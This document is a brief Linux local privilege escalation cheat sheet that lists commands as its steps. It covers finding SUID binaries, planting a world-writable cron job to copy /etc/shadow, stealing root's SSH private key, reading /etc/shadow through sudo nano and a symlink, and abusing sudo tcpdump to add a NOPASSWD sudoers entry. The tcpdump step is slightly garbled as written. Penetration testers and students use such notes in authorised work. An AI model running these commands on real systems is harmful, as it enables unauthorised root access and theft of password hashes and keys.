Local Privilege Escalation


find / -perm -4000 2>/dev/null 

Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.


# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and who as
cat /etc/crontab

# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob

Readable SSH

# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh 

# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa

ssh -i /home/<user>/.ssh/id_rsa root@localhost
# Check sudo rights 
sudo -l 

# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it 
# File in example is readme.txt

 ln -s /etc/shadow readme.txt
 # Link to proper terminal
 export TERM=xterm

#Read file
sudo nano readme.txt


# If tcpdump is in sudo list then we can abuse

# Create a file /tmp/elevate

echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers

chmod +x /tmp/elevate
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash

Last updated